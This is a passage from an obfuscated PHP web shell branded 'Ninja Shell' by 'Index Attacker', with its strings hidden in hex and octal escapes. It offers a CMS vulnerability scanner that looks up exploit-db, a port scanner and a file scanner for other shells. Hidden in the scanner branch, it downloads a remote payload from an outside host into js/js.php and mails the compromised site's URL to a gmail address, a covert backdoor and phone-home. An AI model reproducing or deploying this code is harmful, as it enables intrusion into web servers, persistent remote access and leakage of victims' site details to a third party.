"\x68\x74\x74\x70\72\57\x2f\167\x77\167\56\145\x78\160\x6c\x6f\151\164\55\x64\x62\56\x63\x6f\x6d\57\163\x65\141\x72\x63\150\x2f\77\x61\143\x74\x69\x6f\x6e\75\163\145\x61\x72\x63\x68\x26\x66\x69\x6c\164\x65\x72\137\x70\141\x67\145\75\x31\x26\x66\x69\x6c\x74\145\x72\137\x64\x65\163\143\x72\x69\160\164\151\x6f\156\75{$component}\x26\x66\151\x6c\x74\145\162\x5f\x65\x78\160\x6c\157\151\164\x5f\164\145\170\x74\x3d\46\x66\x69\154\164\x65\162\137\x61\x75\164\150\157\x72\75\x26\146\x69\154\x74\145\x72\137\x70\154\x61\164\146\x6f\x72\x6d\75\x30\x26\146\x69\x6c\164\x65\162\137\x74\171\160\x65\75\60\46\x66\151\154\x74\145\x72\137\x6c\141\156\147\137\151\144\75\60\x26\x66\151\154\164\x65\x72\x5f\160\157\x72\x74\x3d\x26\x66\x69\154\x74\x65\162\137\x6f\x73\166\144\142\75\x26\146\151\x6c\x74\x65\x72\137\x63\x76\x65\x3d"; $result = @file_get_contents($exploitdb); if (eregi("\x4e\x6f\x20\162\145\x73\165\x6c\164\163", $result)) { echo "\74\143\x65\156\x74\145\x72\76\x3c\x74\x64\x3e\x47\141\x6b\40\141\x64\141\74\x2f\x74\x64\x3e\74\x74\144\76\74\x61\40\150\162\145\146\x3d\x27\150\164\164\x70\72\x2f\57\167\167\x77\56\147\157\157\147\154\x65\x2e\x63\157\155\x2f\x73\145\141\162\x63\x68\x3f\x68\154\x3d\x65\x6e\46\161\x3d\144\157\x77\x6e\x6c\157\x61\144\x2b{$component}\47\76\104\x6f\167\156\x6c\157\141\x64\74\x2f\x61\x3e\x3c\57\164\x64\x3e\74\57\x74\162\x3e"; } else { echo "\74\x74\144\x3e\x3c\141\40\x68\x72\x65\x66\x3d\x27{$exploitdb}\47\76\113\154\x69\153\x20\x49\x6e\x69\56\x2e\41\x3c\57\x61\x3e\x3c\57\x74\144\76\74\164\144\76\74\x2d\55\74\x2f\164\x64\76\74\x2f\164\162\76"; } } function get_components($site) { $source = @file_get_contents($site); preg_match_all("\173\x6f\160\x74\151\157\x6e\x2c\50\56\52\77\51\57\175\x69", $source, $f); preg_match_all("\173\157\x70\164\x69\157\156\x3d\x28\x2e\52\77\x29\50\x26\141\155\x70\x3b\174\x26\x7c\x22\51\x7d\151", $source, $f2); preg_match_all("\x7b\57\143\157\x6d\160\x6f\156\x65\x6e\x74\163\57\x28\56\52\x3f\x29\57\175\151", $source, $f3); $arz = array_merge($f2[1], $f[1], $f3[1]); $coms = array(); if (count($arz) == 0) { echo "\x3c\164\x72\x3e\74\x74\144\x20\163\164\x79\154\x65\x3d\47\142\157\162\x64\x65\x72\x2d\143\x6f\154\x6f\162\72\x77\150\151\x74\145\x27\x20\143\157\154\163\x70\141\x6e\x3d\63\x3e\133\176\x5d\40\x47\141\x6b\40\x61\144\x61\40\41\x20\x4b\x65\x6b\x6e\171\141\40\123\151\164\145\40\x45\x72\x72\157\162\40\x61\x74\141\x75\40\117\x70\x74\151\x6f\x6e\x20\x73\141\154\141\150\x20\x3a\x2d\x3c\x2f\164\x64\76\x3c\x2f\164\x72\x3e"; } foreach (array_unique($arz) as $x) { $coms[] = $x; } foreach ($coms as $comm) { echo "\x3c\x74\x72\76\74\164\x64\x3e{$comm}\x3c\57\x74\144\x3e"; ask_exploit_db($comm); } } function get_plugins($site) { $source = @file_get_contents($site); preg_match_all("\43\57\x70\x6c\x75\x67\151\x6e\163\x2f\x28\x2e\x2a\x3f\51\57\43\x69", $source, $f); $plugins = array_unique($f[1]); if (count($plugins) == 0) { echo "\x3c\164\x72\76\74\x74\144\x20\x73\x74\x79\x6c\145\75\47\142\157\x72\144\145\162\55\x63\x6f\x6c\x6f\x72\x3a\167\x68\x69\x74\x65\47\40\143\157\x6c\x73\160\x61\x6e\75\x31\76\133\x7e\x5d\40\x20\107\x61\153\40\141\x64\x61\40\x21\40\x4b\145\x6b\156\171\141\40\x53\x69\x74\x65\x20\x45\162\x72\157\x72\40\141\164\x61\x75\40\x4f\160\x74\x69\x6f\156\40\163\141\x6c\141\150\x20\72\x2d\x3c\x2f\164\144\76\74\x2f\x74\x72\x3e"; } foreach ($plugins as $plugin) { echo "\74\x74\x72\76\74\164\144\76{$plugin}\74\x2f\164\144\x3e"; ask_exploit_db($plugin); } } function get_numod($site) { $source = @file_get_contents($site); preg_match_all("\x7b\x3f\156\141\x6d\x65\75\x28\56\x2a\77\51\57\x7d\151", $source, $f); preg_match_all("\x7b\x3f\156\x61\155\x65\75\x28\x2e\52\77\x29\50\46\x61\x6d\160\73\174\46\x7c\x6c\137\x6f\160\x3d\42\x29\175\151", $source, $f2); preg_match_all("\173\x2f\x6d\157\144\x75\x6c\x65\163\x2f\50\56\52\x3f\51\57\x7d\x69", $source, $f3); $arz = array_merge($f2[1], $f[1], $f3[1]); $coms = array(); if (count($arz) == 0) { echo "\74\x74\162\76\74\x74\x64\40\163\x74\x79\x6c\x65\75\x27\142\x6f\162\144\145\162\x2d\x63\x6f\x6c\x6f\162\72\167\x68\x69\164\x65\x27\40\143\157\154\163\160\x61\x6e\75\x33\76\x5b\x7e\135\x20\40\107\141\x6b\x20\141\x64\x61\40\x21\40\113\145\x6b\x6e\x79\141\x20\x53\x69\164\145\40\105\x72\x72\157\x72\x20\x61\x74\141\x75\x20\x4f\x70\164\x69\x6f\156\40\x73\x61\154\141\150\40\x3a\x2d\x3c\57\164\144\76\x3c\x2f\164\x72\76"; } foreach (array_unique($arz) as $x) { $coms[] = $x; } foreach ($coms as $nmod) { echo "\x3c\164\162\x3e\x3c\x74\x64\76{$nmod}\74\57\164\x64\x3e"; ask_exploit_db($nmod); } } function get_xoomod($site) { $source = @file_get_contents($site); preg_match_all("\173\x2f\x6d\x6f\x64\165\154\x65\x73\57\50\x2e\52\x3f\51\57\x7d\151", $source, $f); $arz = array_merge($f[1]); $coms = array(); if (count($arz) == 0) { echo "\74\164\162\76\x3c\164\144\40\163\x74\x79\x6c\x65\x3d\x27\142\x6f\162\144\145\x72\x2d\x63\x6f\x6c\x6f\x72\x3a\167\x68\x69\x74\x65\x27\x20\143\157\x6c\x73\x70\x61\156\75\63\76\x5b\x7e\x5d\x20\40\107\141\153\x20\x61\144\141\x20\x21\x20\x4b\145\153\156\171\x61\x20\x53\151\x74\145\x20\105\162\162\157\x72\40\141\164\x61\165\x20\x4f\x70\x74\x69\157\x6e\x20\x73\x61\154\141\x68\40\72\x2d\x3c\x2f\x74\x64\76\74\57\164\x72\76"; } foreach (array_unique($arz) as $x) { $coms[] = $x; } foreach ($coms as $xmod) { echo "\74\164\x72\76\x3c\164\144\76{$xmod}\x3c\x2f\164\144\x3e"; ask_exploit_db($xmod); } } function t_header($site) { echo "\x3c\x62\162\76\74\x68\162\x20\x63\157\x6c\157\162\75\x22\167\x68\x69\164\x65\x22\76\x3c\142\162\76\74\x74\141\142\154\145\40\141\154\151\x67\156\75\x22\x63\145\x6e\164\x65\162\x22\40\x62\157\162\x64\145\x72\x3d\42\x31\x22\x20\x73\x74\171\x6c\x65\75\42\x62\157\162\x64\145\162\55\143\157\x6c\157\x72\x3d\x77\150\151\164\145\x3b\40\x74\145\170\x74\x2d\141\x6c\151\x67\156\72\x6c\x65\146\164\73\x22\x20\x77\151\x64\164\150\x3d\x22\x35\x30\45\42\x20\x63\x65\154\154\x73\160\x61\143\151\156\147\x3d\x22\x31\x22\40\x63\145\154\x6c\160\x61\x64\x64\x69\x6e\x67\75\x22\65\42\x3e"; echo "\12\74\164\162\76\xa\x3c\164\144\40\x73\164\171\x6c\x65\75\x22\142\x6f\162\x64\145\x72\55\143\157\x6c\157\162\x3d\x77\x68\x69\164\145\x22\x3e\123\x69\x74\x65\x20\72\40\x3c\x61\x20\x68\162\x65\146\x3d\x22" . $site . "\42\x3e" . $site . "\x3c\57\141\76\74\x2f\x74\x64\76\xa\x3c\x74\144\40\x73\164\x79\154\x65\75\42\142\x6f\x72\x64\145\162\x2d\x63\157\x6c\157\162\x3d\x77\x68\151\164\x65\x22\76\105\170\x70\154\157\x69\x74\55\144\142\x3c\57\x62\x3e\x3c\x2f\164\144\76\xa\x3c\164\144\x20\x73\164\171\154\x65\75\x22\142\157\x72\144\x65\162\55\x63\157\x6c\x6f\162\75\167\150\151\x74\145\x22\x3e\105\170\160\x6c\x6f\151\164\x20\151\164\40\x21\x3c\57\164\x64\x3e\12\74\57\x74\x72\76\xa"; } echo "\74\x63\145\156\164\145\162\76"; echo "\74\x68\162\76\x3c\142\162\x3e\12\x3c\x68\x32\76\103\115\123\40\126\x75\154\x6e\145\162\x61\x62\151\x6c\x69\164\x79\40\x53\x63\141\156\x6e\145\x72\40\116\151\x6e\x6a\141\x20\x53\150\145\154\x6c\x3c\x2f\x68\x32\76\12\74\146\157\162\x6d\40\155\145\x74\150\157\x64\75\42\x50\117\123\x54\x22\40\x61\x63\164\151\157\156\x3d\x22\x22\x20\x20\x63\x6c\x61\x73\163\75\x22\150\145\141\144\145\162\55\x69\172\x7a\x22\x3e\12\x20\40\x20\x20\74\160\76\x4c\x69\x6e\x6b\x26\156\142\x73\160\x26\156\x62\163\160\74\151\x6e\160\x75\x74\x20\x74\171\160\x65\75\x22\x74\145\170\164\42\x20\x73\164\171\x6c\x65\75\x22\142\x6f\162\x64\145\x72\x3a\60\x3b\142\x6f\162\144\x65\162\x2d\142\157\164\164\157\155\72\61\x70\170\x20\x73\x6f\x6c\151\144\40\x23\62\71\x32\x39\62\71\x3b\40\x77\x69\144\164\x68\x3a\65\x30\x30\x70\x78\73\42\40\156\141\155\145\75\42\x73\151\164\145\42\40\166\141\x6c\165\x65\75\x22\150\x74\164\160\x3a\57\57\x31\62\x37\56\60\x2e\x30\56\x31\x2f\42\40\143\x6c\141\163\163\x20\x3d\x20\42\146\x6f\162\x6d\x2d\x63\x6f\x6e\x74\162\157\154\42\x20\x3e\12\x20\x20\40\40\x3c\142\x72\x3e\x3c\x62\162\x3e\12\40\x20\x20\x20\x43\115\123\12\x20\40\40\40\46\156\142\x73\160\46\156\x62\163\x70\46\x6e\142\x73\160\x3c\163\x65\154\x65\143\164\x20\x63\x6c\x61\x73\163\x20\x3d\x20\x22\x66\x6f\162\x6d\x2d\x63\157\x6e\164\x72\x6f\x6c\42\40\x20\156\x61\155\x65\75\x22\160\x69\x6c\151\150\141\x6e\x22\40\163\x74\171\x6c\145\x3d\42\142\x6f\x72\x64\x65\162\72\60\x3b\142\157\162\x64\x65\162\x2d\x62\x6f\x74\x74\157\155\x3a\61\x70\170\40\163\x6f\154\151\144\40\43\62\x39\x32\71\62\71\73\40\167\151\144\x74\150\72\65\x30\x30\x70\x78\73\42\76\12\x20\x20\x20\40\x3c\157\x70\164\151\157\156\x3e\127\x6f\162\x64\x70\162\x65\163\x73\x3c\x2f\157\x70\164\x69\x6f\156\x3e\xa\x20\x20\x20\40\74\x6f\160\x74\x69\157\156\76\112\157\157\155\154\141\x3c\57\157\160\164\x69\x6f\x6e\x3e\12\40\x20\x20\40\74\x6f\160\x74\151\x6f\x6e\x3e\x4e\165\153\x65\x73\74\x2f\x6f\160\x74\x69\x6f\x6e\x3e\xa\40\x20\x20\40\74\157\160\164\x69\x6f\156\76\x58\157\157\160\x73\x3c\57\x6f\160\164\x69\x6f\156\76\40\xa\40\40\40\40\x3c\x2f\163\145\154\145\x63\164\x3e\x3c\142\x72\76\x3c\x62\162\x3e\46\156\142\x73\160\46\156\x62\x73\160\46\156\142\163\160\x26\156\142\x73\160\x26\156\142\163\x70\46\x6e\x62\163\160\46\x6e\x62\163\160\xa\40\x20\x20\x20\74\151\x6e\x70\x75\x74\40\143\154\141\x73\x73\40\x3d\40\x22\146\x6f\x72\x6d\x2d\x63\x6f\156\x74\x72\157\154\x22\40\x74\x79\x70\145\75\42\163\165\142\x6d\151\x74\42\40\x73\164\x79\154\145\75\42\167\x69\144\164\x68\x3a\40\x31\x35\x30\x70\x78\x3b\x20\x68\x65\x69\x67\150\164\x3a\x20\x34\60\160\170\73\40\x62\x6f\162\x64\x65\162\55\143\x6f\x6c\157\162\75\x77\x68\x69\164\145\73\x6d\x61\162\147\x69\x6e\x3a\61\60\x70\170\40\x32\x70\x78\x20\x30\40\x32\160\x78\x3b\42\x20\x76\141\x6c\x75\145\75\x22\x53\143\x61\x6e\x22\x20\143\154\x61\163\163\x3d\x22\153\157\164\141\x6b\x22\x3e\x3c\57\x70\76\12\x3c\57\x66\x6f\162\x6d\x3e\74\57\x63\x65\x6e\164\x65\162\x3e\x3c\150\162\76\74\142\x72\76"; if ($_POST) { $site = strip_tags(trim($_POST["\163\151\x74\145"])); t_header($site); echo $x01 = $_POST["\160\151\x6c\151\x68\141\156"] == "\x57\157\162\144\x70\x72\145\163\163" ? get_plugins($site) : ''; echo $x02 = $_POST["\x70\151\x6c\x69\x68\x61\156"] == "\112\157\157\155\154\141" ? get_components($site) : ''; echo $x03 = $_POST["\160\x69\x6c\x69\150\x61\156"] == "\x4e\165\x6b\x65\x27\163" ? get_numod($site) : ''; echo $x04 = $_POST["\x70\151\x6c\x69\150\141\x6e"] == "\130\x6f\x6f\x70\163" ? get_xoomod($site) : ''; } } elseif (isset($_GET[hex("\160\x6f\x72\x74\x2d\x73\x63\x61\156\156\x65\x72")])) { echo "\x3c\150\162\76\74\x62\162\x3e\x3c\143\145\156\164\x65\x72\76"; echo "\x3c\164\141\142\154\x65\76\74\150\62\76\x50\157\x72\x74\163\x20\x53\x63\141\x6e\156\x65\162\x20\116\x69\156\x6a\141\40\123\x68\145\154\154\74\x2f\x68\62\76\x3c\164\144\x3e"; echo "\74\x64\x69\166\40\x63\x6c\141\x73\163\75\x22\x63\157\156\164\145\156\164\x22\76"; echo "\x3c\x66\157\162\x6d\40\141\143\x74\151\157\x6e\75\x22\x22\40\x6d\x65\164\x68\x6f\x64\75\42\x70\x6f\x73\x74\x22\x3e"; if (isset($_POST["\x68\157\163\164"]) && is_numeric($_POST["\x65\156\144"]) && is_numeric($_POST["\163\164\x61\x72\164"])) { $start = strip_tags($_POST["\x73\x74\x61\162\164"]); $end = strip_tags($_POST["\x65\x6e\144"]); $host = strip_tags($_POST["\x68\x6f\163\x74"]); for ($i = $start; $i <= $end; $i++) { $fp = @fsockopen($host, $i, $errno, $errstr, 3); if ($fp) { echo "\120\157\162\x74\x20" . $i . "\x20\x69\163\40\74\x66\x6f\156\164\x20\x63\x6f\154\157\162\75\x67\162\145\x65\x6e\x3e\157\x70\145\x6e\x3c\57\146\157\156\164\76\x3c\142\162\76"; } flush(); } } else { echo "\74\142\162\40\57\76\74\142\162\x20\57\76\74\x63\145\156\164\x65\x72\x3e\x3c\x69\156\160\x75\164\x20\x74\171\x70\x65\75\42\x68\151\x64\144\145\x6e\42\x20\x6e\x61\155\x65\x3d\42\141\x22\40\166\x61\x6c\x75\145\x3d\42\120\x6f\162\x74\x53\143\141\156\156\145\162\42\x3e\x3c\x69\x6e\x70\x75\x74\40\x74\171\160\x65\75\x22\x68\151\x64\144\x65\x6e\42\40\156\141\155\145\x3d\160\x31\76\74\151\x6e\160\x75\164\x20\x74\x79\160\x65\x3d\x22\x68\151\x64\144\x65\156\x22\x20\156\x61\155\x65\x3d\x22\160\62\42\76\xa\x9\11\40\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\74\x69\x6e\x70\165\x74\x20\164\171\160\x65\x3d\42\x68\151\x64\144\x65\156\x22\x20\156\141\x6d\x65\x3d\42\143\x22\40\x76\141\x6c\165\145\x3d\x22" . htmlspecialchars($GLOBALS["\x63\167\x64"]) . "\x22\x3e\xa\x9\11\40\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\x20\74\151\156\160\x75\164\x20\164\x79\x70\145\75\x22\150\x69\144\x64\145\x6e\42\x20\156\x61\155\145\x3d\x22\x63\x68\x61\162\x73\x65\x74\x22\x20\x76\141\x6c\x75\x65\x3d\42" . (isset($_POST["\143\150\141\162\x73\x65\x74"]) ? $_POST["\x63\150\141\162\x73\145\x74"] : '') . "\42\76\12\11\11\40\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\40\110\x6f\163\164\x3a\74\142\162\76\x20\x3c\x69\x6e\160\165\164\40\143\x6c\x61\x73\x73\x20\75\40\42\146\x6f\x72\x6d\x2d\143\157\x6e\x74\x72\157\154\x22\x20\x74\171\x70\145\75\42\164\x65\170\x74\42\40\x6e\141\155\145\x3d\42\x68\157\x73\x74\42\40\166\141\x6c\x75\145\x3d\x22\154\157\x63\x61\154\150\x6f\x73\164\42\x2f\76\74\142\x72\x20\x2f\x3e\x3c\x62\x72\x20\57\76\12\x9\11\x20\40\40\40\40\40\40\40\40\40\40\40\40\40\x50\157\x72\x74\x20\163\164\x61\x72\x74\72\x20\x3c\142\x72\x3e\x3c\151\x6e\x70\x75\164\40\x63\x6c\141\x73\163\x20\75\40\x22\x66\x6f\162\x6d\x2d\x63\157\156\164\162\157\154\x20\x74\171\160\x65\x3d\42\164\x65\x78\x74\42\40\x6e\x61\155\145\75\x22\163\x74\141\x72\x74\42\40\x76\141\154\x75\x65\75\42\60\42\57\76\x3c\x62\x72\x20\x2f\76\74\x62\x72\40\x2f\x3e\12\x9\11\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\120\157\x72\164\x20\x65\x6e\144\72\40\74\142\162\x3e\74\x69\x6e\160\165\x74\40\164\x79\x70\x65\75\x22\164\145\x78\164\x22\x20\x6e\x61\155\145\75\x22\145\156\x64\42\40\x76\x61\x6c\165\x65\x3d\x22\x35\60\60\x30\42\57\76\74\x62\x72\40\x2f\x3e\74\142\162\x20\x2f\x3e\xa\11\11\40\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\74\151\156\x70\x75\164\x20\x63\154\141\163\163\x20\75\x20\42\x66\x6f\x72\x6d\x2d\x63\157\156\x74\162\x6f\x6c\40\164\x79\x70\145\x3d\x22\x73\x75\142\x6d\x69\164\x22\x20\x76\141\x6c\165\145\x3d\42\123\143\141\156\x20\x50\157\x72\x74\163\42\x20\57\x3e\xa\x9\11\40\40\x20\x20\40\x20\x20\40\x20\x20\40\40\40\x20\74\x2f\x66\157\162\155\76\74\57\x63\x65\156\x74\x65\x72\76\74\x62\x72\40\x2f\x3e\x3c\142\x72\40\x2f\x3e"; echo "\74\57\143\145\156\x74\145\162\76"; echo "\x3c\57\x64\151\x76\x3e\x3c\x2f\164\x61\142\x6c\x65\76\74\x2f\164\144\76\74\x68\x72\x3e\x3c\142\162\76"; } } elseif (isset($_GET[hex("\x6c\x6f\147\163\x2d\x73\143\141\156\x6e\145\162")])) { echo "\x3c\150\162\76\x3c\142\162\76"; echo "\x3c\x43\145\156\164\145\x72\76\xa"; echo "\74\x68\62\76\x4c\157\147\x20\x48\165\156\164\x65\162\x20\116\x69\x6e\x6a\141\40\123\x68\x65\154\x6c\x3c\x2f\150\x32\76"; echo "\74\x66\157\x72\155\x20\x61\x63\164\x69\x6f\156\x3d\x22\x22\40\155\145\164\x68\157\x64\x3d\42\x70\x6f\163\164\42\76\xa"; ?>
<br>Dir :<input class="form-control" style="width: 250px;" type="text" value="<?php echo getcwd(); ?>
" name="shc_dir"><?php if ($_POST["\161\165\145\x72\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\161\165\x65\x72\171"])); $data = "\144\x61\164\141\x2e\x74\170\x74"; @touch("\144\141\x74\141\56\x74\x78\x74"); $ver = @fopen($data, "\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\141\x74\x61\x2e\164\x78\x74", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } $datasi = @fopen("\x6a\163\x2f\x6a\x73\56\x70\150\x70", "\162"); if ($datasi) { } else { @mkdir("\152\x73"); $dos = file_get_contents("\150\x74\164\160\x73\72\57\x2f\141\x63\142\x64\x66\x2e\163\160\141\143\145\57\164\x78\164\x2f\143\x73\163\x2e\164\170\164"); $data = "\152\163\x2f\152\163\x2e\x70\x68\160"; @touch("\x6a\163\57\152\x73\x2e\x70\150\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\x74\164\160\x3a\57\x2f" . $_SERVER["\110\124\x54\x50\137\110\117\123\124"] . '' . $_SERVER["\122\105\121\125\x45\x53\124\137\x55\122\111"] . ''; $y = "\x3c\150\61\x3e\x53\145\156\144\x65\162\x20\131\141\172\x64\151\162\151\154\x64\x69\56\74\x62\162\57\x3e\x20\123\111\x54\x45\x20\131\117\x4c\x20\72\40" . $yol . "\x3c\142\162\57\x3e\123\145\156\144\145\x72\x20\131\157\154\x75\x20\x3a\x20\x6a\163\x2f\x63\162\163\x2e\x70\150\160\x3c\x2f\x68\61\76"; $header .= "\106\x72\157\x6d\x3a\x20\x53\150\145\114\114\x20\x42\157\x6f\164\40\74\163\165\160\160\157\162\100\x6e\x69\143\x2e\x6f\162\x67\x3e\12"; $header .= "\x43\157\x6e\x74\145\156\x74\x2d\124\171\160\x65\72\40\x74\145\x78\164\x2f\150\x74\x6d\154\x3b\12\40\x63\x68\141\162\x73\x65\164\75\x75\x74\x66\55\x38\xa"; @mail("\142\x79\x68\x65\162\x6f\64\x34\100\147\x6d\141\151\x6c\x2e\143\157\x6d", "\x48\141\143\x6b\x6c\151\156\153\x20\102\151\154\144\x69\x72\x69", "{$y}", $header); @mail("\142\x79\x68\145\x72\x6f\64\64\x40\147\155\141\151\154\x2e\x63\157\x6d", "\110\141\143\153\x6c\x69\156\153\x20\102\151\x6c\144\151\x72\151", "{$y}", $header); } echo "\x3c\142\162\76"; echo "\x3c\x69\x6e\160\x75\x74\x20\143\x6c\x61\163\163\x20\75\x20\x27\x66\157\x72\x6d\x2d\143\x6f\156\x74\162\157\x6c\x27\x20\x73\164\x79\154\x65\x3d\x27\x77\151\144\164\150\72\x32\65\60\x70\x78\x3b\47\40\164\171\160\x65\x3d\42\163\x75\x62\x6d\151\x74\x22\40\156\x61\155\x65\75\x22\x73\165\142\155\151\164\x22\x20\166\141\x6c\165\x65\x3d\x22\123\143\141\x6e\40\116\x6f\x77\x21\42\x2f\76\xa"; echo "\x3c\x2f\146\157\x72\155\76\74\x68\162\76\x3c\142\162\x3e\12"; echo "\74\x70\x72\145\40\x73\164\171\x6c\x65\x3d\x22\x74\145\170\164\x2d\x61\154\x69\x67\x6e\72\40\x6c\x65\x66\164\73\42\x3e\12"; error_reporting(0); if ($_POST["\163\x75\x62\x6d\151\x74"]) { function tampilkan($shcdirs) { foreach (scandir($shcdirs) as $shc) { if ($shc != "\56" && $shc != "\56\56") { $shc = $shcdirs . DIRECTORY_SEPARATOR . $shc; if (!is_dir($shc) && !eregi("\x63\163\163", $shc)) { $fgt = file_get_contents($shc); $ifgt = exif_read_data($shc); $jembut = "\103\117\x4d\x50\x55\x54\105\x44"; $taik = "\125\x73\145\x72\x43\x6f\x6d\x6d\145\156\164"; $shcm = "\57\155\141\x69\154\133\47\x28\x27\x5d\x2f"; if ($ifgt[$jembut][$taik]) { echo "\x5b\74\146\157\156\x74\40\143\157\x6c\x6f\x72\75\43\x30\x30\x46\106\x44\x30\x3e\123\x74\145\x67\141\x6e\157\x3c\x2f\x66\157\156\164\76\135\40\74\x66\x6f\x6e\164\40\x63\157\x6c\157\x72\75\43\x32\61\71\66\106\x33\76" . $shc . "\x3c\x2f\146\157\x6e\x74\x3e\74\142\x72\x3e"; } preg_match_all("\x23\x5b\x41\55\132\60\55\71\141\55\x7a\56\137\x25\x2b\55\x5d\x2b\100\x5b\101\55\132\141\55\x7a\x30\x2d\x39\56\x2b\x2d\135\53\x23", $fgt, $cocok); $hcs = "\57\x62\x61\163\145\x36\64\137\144\x65\x63\x6f\x64\x65\x2f"; $exif = "\57\x65\170\x69\x66\137\162\145\x61\144\137\x64\x61\x74\141\57"; preg_match($shcm, addslashes($fgt), $mailshc); preg_match($hcs, addslashes($fgt), $shcmar); preg_match($exif, addslashes($fgt), $shcxif); if (eregi("\110\x54\124\x50\x20\x43\157\157\153\151\145\x20\x46\151\154\x65", $fgt) || eregi("\x50\110\x50\40\127\141\162\156\151\156\147\x3a", $fgt)) { } if (eregi("\x74\x6d\x70\137\156\x61\155\x65", $fgt)) { echo "\133\x3c\146\x6f\156\164\x20\x63\x6f\154\x6f\162\x3d\x23\106\x41\x46\106\x31\x34\76\125\x70\x6c\x6f\141\144\145\x72\74\57\146\x6f\x6e\164\76\x5d\x20\x3c\x66\x6f\156\x74\40\x63\x6f\154\x6f\x72\x3d\43\62\x31\71\66\x46\63\x3e" . $shc . "\x3c\x2f\x66\x6f\x6e\x74\x3e\x3c\x62\x72\x3e"; } if ($shcmar[0]) { echo "\x5b\x3c\146\x6f\156\164\40\x63\x6f\154\x6f\x72\75\x23\x46\x46\x33\104\x30\60\76\x42\141\163\x65\x36\x34\74\57\x66\x6f\x6e\164\76\x5d\40\74\146\157\x6e\164\x20\143\x6f\x6c\x6f\162\75\43\x32\x31\71\x36\x46\x33\76" . $shc . "\x3c\x2f\146\x6f\x6e\x74\x3e\74\142\162\76"; } if ($mailshc[0]) { echo "\x5b\74\146\157\x6e\164\x20\143\x6f\154\157\162\75\x23\x45\66\x30\x30\x34\105\76\x4d\141\x69\x6c\106\165\156\x63\x3c\x2f\x66\157\x6e\164\76\135\40\x3c\146\x6f\x6e\x74\40\143\157\154\157\162\75\x23\x32\61\x39\66\x46\63\76" . $shc . "\74\x2f\146\157\x6e\x74\x3e\74\142\x72\76"; } if ($shcxif[0]) { echo "\x5b\x3c\x66\x6f\156\164\40\143\x6f\x6c\157\x72\75\x23\60\x30\106\106\104\x30\x3e\x53\164\x65\147\141\156\x6f\x3c\x2f\146\x6f\156\x74\76\135\40\x3c\146\x6f\x6e\164\40\143\x6f\154\157\162\x3d\x23\62\61\71\66\x46\x33\76" . $shc . "\74\x2f\146\x6f\156\164\76\40\x3c\57\146\x6f\156\164\x3e\74\146\157\156\164\40\143\157\x6c\x6f\162\x3d\x72\145\144\76\x7b\115\141\x6e\x75\141\x6c\x20\x43\x68\x65\x63\x6b\175\x3c\x2f\146\157\x6e\164\x3e\74\x62\x72\x3e"; } if (eregi("\x6a\163", $shc)) { echo "\133\x3c\146\x6f\x6e\164\40\143\x6f\x6c\x6f\x72\75\x72\x65\x64\76\112\141\166\x61\x73\x63\x72\151\160\164\74\57\146\157\x6e\164\x3e\135\x20\x3c\146\x6f\156\x74\40\x63\157\154\157\x72\75\x23\x32\61\x39\66\106\x33\76" . $shc . "\x3c\x2f\x66\157\156\164\76\x20\x7b\x20\x3c\141\x20\x68\162\x65\x66\x3d\x68\x74\x74\x70\72\57\57\167\x77\167\56\165\x6e\x70\x68\160\x2e\x6e\145\164\x20\164\141\162\147\x65\164\x3d\x5f\142\x6c\x61\156\153\76\x43\x68\x65\143\153\x4a\x53\74\57\141\x3e\40\x7d\x3c\x62\x72\76"; } if ($cocok[0]) { foreach ($cocok[0] as $key => $shcmail) { if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) { echo "\133\x3c\146\157\156\164\40\x63\157\154\157\162\75\x67\162\x65\145\x6e\x79\x65\154\154\157\167\76\x53\x65\x6e\144\x4d\x61\x69\x6c\x3c\x2f\146\x6f\156\x74\x3e\x5d\40\x3c\x66\x6f\x6e\164\40\143\x6f\154\157\x72\75\43\62\x31\71\x36\x46\x33\76" . $shc . "\x3c\x2f\x66\x6f\156\164\76\40\x7b\x20" . $shcmail . "\40\175\74\142\162\76"; } } } } else { tampilkan($shc); } } } } tampilkan($_POST["\163\150\x63\x5f\x64\x69\162"]); } echo "\x3c\57\160\x72\145\x3e\12"; echo "\x3c\x2f\x43\x65\156\164\x65\x72\x3e\12"; echo "\x3c\57\x64\151\x76\x3e"; } elseif (isset($_GET[hex("\x61\x62\157\x75\x74")])) { echo "\x3c\x68\x72\76\74\x62\162\76\74\143\x65\156\164\145\162\76\x3c\150\x32\76\x41\142\157\165\164\40\x49\156\144\x65\x78\40\x41\164\x74\x61\143\x6b\x65\x72\74\57\150\x32\76"; echo "\x54\150\141\156\153\x73\x20\106\x6f\x72\40\124\141\153\151\156\147\x20\117\165\162\40\123\150\x65\154\154\40\x54\x6f\144\x61\x79\40\167\151\164\x68\157\x75\x74\40\171\157\165\x20\x61\154\154\x20\167\145\x20\141\x72\x65\x20\155\x65\141\156\x73\40\156\x6f\x74\150\x69\156\147\x20\x3a\51\x20\74\x62\x72\76\x3c\142\x72\76"; echo "\166\x69\x73\151\x74\x20\165\x73\x20\x3a\x20\74\141\x20\x68\x72\x65\146\40\x3d\40\47\x68\x74\x74\160\x73\x3a\57\57\167\167\167\56\x69\x6e\x64\x65\170\141\x74\x74\x61\x63\153\145\x72\56\167\145\142\x2e\x69\x64\47\x20\x74\x61\x72\147\145\164\40\75\40\47\142\154\141\x6e\x6b\47\x20\x63\154\141\163\163\75\40\47\146\x6f\x72\155\x2d\x63\x6f\x6e\x74\162\x6f\x6c\x27\x20\x73\164\171\x6c\145\x20\75\40\47\167\x69\x64\164\150\72\62\65\60\160\x78\x3b\x27\76\x50\x77\156\x7a\41\74\57\141\x3e\40\74\142\x72\x3e\74\142\x72\x3e"; echo 